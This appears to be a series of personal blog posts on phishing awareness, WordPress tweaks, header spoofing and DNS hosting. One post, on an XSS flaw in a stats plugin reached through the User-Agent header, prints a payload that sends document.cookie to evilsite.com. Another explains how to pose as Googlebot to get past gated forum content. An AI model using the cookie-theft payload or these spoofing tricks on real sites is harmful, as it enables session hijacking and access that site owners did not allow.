K World

Recently, too much action happening when it comes to email accounts. Couple of friends complained that they’ve lost their logins all of a sudden. One friend from college complained that his girl’s email account was compromised. They believe that some hacker at brazil opened his terminal and wrote ./hack user@gmail.com to hack them. Few really think that it as simple as opening Microsoft Word and write “Access Granted” in Green color to hack.

I want to tell them one thing. These days, most of the email services are fairly secure ( *cough* *cough* Not talking about rediff which added ssl login a month before or India times which use to save password in cookie as plain text) But, I’m talking about services like Gmail or Yahoo. But, we need to accept the fact that even though we are intelligent and we’ve some protection on our computers like Antivirus, firewalls for windows folks, or like my friend Hari tells, install Linux, or as Ashok suggests OS X … we are busy most of the time. Some times, we don’t use our brain while doing some small things.

You would be talking to your friend on mobile phone and checking orkut for new scraps. The guy one phone might be telling you about his new project or something like that and you are involved in the chat. There could be some scrap from a girl … Karteek, greeting card for you !!! As usual, we click on the link, and it tells you that you need to login to view the card and you just login while talking on phone.

…

…

…

[Recap]

What happened ? -> You clicked on the link

After that ? -> It asked you to login

Then ? -> You logged in

Then -> It might tell you to login again as your password is wrong

After that ??? -> You logged in or it logged you in automatically or you just left it

…

…

Now, the analysis part. Well, nothing big happened. You were just Phished. You tried to login to a service on a fake login screen. You might lose many things through that username and password (your email might have much info).

Now, coming to the important part, how to escape from it ? Well, be careful is my answer. But, I know that I told you that we might just get carried away sometimes. For that I coded a small greasemonkey script which will protect you from low level phishing attacks. Yes, only low level. If the hacker is intelligent, he can game it easily, but most of the time intelligent hackers have much more useful things to do than to hack you. So, dont worry much about it.

The script is well commented. It doesn’t do wonders but just serves the purpose. Feel free to edit it make it more useful and share with others. I dont care about licenses, so I don’t mind even if you tell your girl friend that you coded it to protect her from being phished

Very important. Never ever install a greasemonkey script unless you read it and damn sure that its secure. Anyway, you can find the script here.

Update : Code made little more logical. Now it won’t annoy much. And by default, I made it support Google, Yahoo, Hotmail and Wordpress. Adding other services is very easy.

Friendfeed is a one great service which I’m using from few days/weeks. So, I thought, I will publish my friendfeed on this blog. Well, as usual, I’ve some of my own requirements. Requirement is that I dont want to show it on my sidebar, but I want to dedicate a page for it. So, I need to take json/xml/rss/atom from friendfeed and create html out of it. Obvious is that I’ve to either write a JS to parse it client side or PHP script to parse it server side. PHP was my choice and I needed an option to exec php on single page. There was on plugin named phpexec, but, I wasn’t very comfortable (call it being paranoid) for using that plugin.

So, I used a small work around. I created a page feed.php and added

/*

Template Name: My Friendfeed

*/

Now, my wordpress thinks that its a template and gives me an option of choosing template while creating pages. I created a page but without any content. I wrote all my php logic in feed.php and now wordpress parses the template and gives me required output. Anyway, you can download the code here. You’ve to extract the contents to your theme folder. Btw, You can see it working here.

Well, its a hackjob. It works (only) for me. If you want to do same, you’ve to edit the code according to your needs. It could have been done far more easily, but my stupid host has php4 and I missed many features. And, I’ve had something else in mind (I thought to publish friendfeed I follow, ie., all friends’ feeds) but later changed mind. By the way, if you don’t know what’s friendfeed, it is an aggregator of all 2.0ish services you might be using in a small definition. Check it if you want to know more, you wont be disappointed.

PS: There is absolutely no reason why I haven’t blogged for more than a month. I wasn’t busy. Its just that nothing had happened in my life to blog. Absolutely nothing. Uhmm, wait, I’ve been to Coorg on an adventure trip. Nothing more than that.

Well, its just not funny way, but very funny way. Neither through a HTTP GET nor a HTTP POST. But, it’s through a header. I haven’t read about this method of XSS up to now, but seriously, its silly and common. Usually webmasters read about the traffic of their websites and Referrer, User-Agent are very common headers they analyze to know the type of visitors and from which site they are coming.

I just spoofed my User-Agent header to “<script>alert(1)</script>”, and when I saw the stats page after that guess what, my stats plugin wasn’t sanitizing the input, and I got the alert window.

Now, going back to fix and report it. Take care about looking at your stats (especially in wordpress). One can rather keeping an alert, can keep some thing like this

<img
src=”javascript:document.images[1].src=%22http://evilsite.com/cookie.php?c%3D+document.cookie;”
style=visibility:hidden />

The above code will send the cookie to cookie.php page of evilsite.com and the hacker can collect the cookies there using a very simple code and he can become you just by using those cookies. This page has many vectors to use. It doesn’t teach you how to use, so, if you really know what you have to do, you must be knowing this page already.

Result, check your stats plugins and make sure that they are sanitizing all the inputs. Just don’t trust them. They can be very dangerous. Finishing yet another episode of “How do THEY do it ?”

A funny feature (or mod) in vBulletin Boards, possibly in other message board scripts too. Have you ever faced this kind of situation ?

1. You need to download something
2. You search in Google and you get some relevant results
3. You click on that and you go to that site
4. You see that the content (or the link to the download) which you needed is not shown instead a message like “This part of the post is available only to registered users” is shown.

I’ve faced that situation. These days, many message boards are coming up with a feature named “Premium Content” which would be available only to registered users. But, in order to get traffic from search engines, those coders are giving an option to let search engines index the premium content. That is the reason why you see the snippet of the content in Google but not when you go to that site.

Here is the tip. Either try to read in the Google cache or become Google Yourself !!! How would you become Google ? Answer is simple, spoof your User-agent to Google. These boards do nothing more than checking your headers.

In firefox, download an extension like User Agent Switcher or Modify Headers and change your user-agent to “Googlebot/2.1 (+http://www.googlebot.com/bot.html)” and this would make the site think that You are Google.

In firefox, there is another option. In address bar type “about:config”, create a new string named “general.useragent.override” and set the value to “Googlebot/2.1 (+http://www.googlebot.com/bot.html)”. Don’t forget all the values without quotes. And this method broke my Gmail as it stops loading Javascript thinking that I’m really incompatible. So, avoid this.

If you use IE, you better switch to firefox for happy browsing. But, if you don’t want to switch and still want my tip, yeah, open registry editor and do whatever you want at
HKLM\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\User Agent

After doing this, just check whether your settings are fine or not @ UserAgent.org. If you want to try something different, telnet to the host on port number 80, and spoof those headers yourself.

Instead doing all this, you can prove that you are very boring by either registering at that site or go check whether there are any working entries at BugMeNot.com, login and read the required information.

BTW, yet another tip which might be useful. An “X-Forwarded-For” header will make the server think that you are a proxy server for the IP address in the value field of that header. In simple words, an IP address like “72.14.2o7.99″ in “X-forwarded-For” header might make the server think that you are a proxy for “72.14.2o7.99″ and save that IP in the log instead of yours. A stupid site like Rediff will give you it’s Rediff Abroad Page thinking that it’s so intelligent to grab your real location using that header because 72.14.2o7.99 is IP address of Google, location is Ca, USA.

Have Fun. Happy Spoofing

I’ve spent another Satyam Cinemas ticket for hosting, this time, to a host which got older-but-stable versions of softwares. I’ve migrated database to this new one as well.

Guess what, this time, I’m trying yet-another-new-thing. Now, I’ve two hosting packages on two different hosts (didn’t waste much money, total cost is three tickets at Satyam Cinemas). My DNS management is done for free by ZoneEdit and it supports Round-robin DNS (A technique that enables a domain to be hosted on multiple servers, and to have the load balanced between them) So, I configured both servers to have my blog and one of the will be pointed by ZoneEdit’s DNS Servers when you request.

Reasons for this action

• I’ve no clue why I did this
• Let me see if I get to learn something new as I got so many new doubts right now while doing it
• First host is bad, I don’t know about second host. Atleast one of them will up to serve the blog

I’ve no clue for following questions

• How am I going to synchronize posts at both the servers ?
• Will DNS server point you to the second server automatically when the first server is down ?
• What exactly will be happening in the background at DNS server and my browser when I request a page ?

I’m sure that I’ll get more doubts and I’m more sure that I’m going to find answers for these questions. If you’ve answers for my questions, please let me know, otherwise, I will let you guys know when I find solutions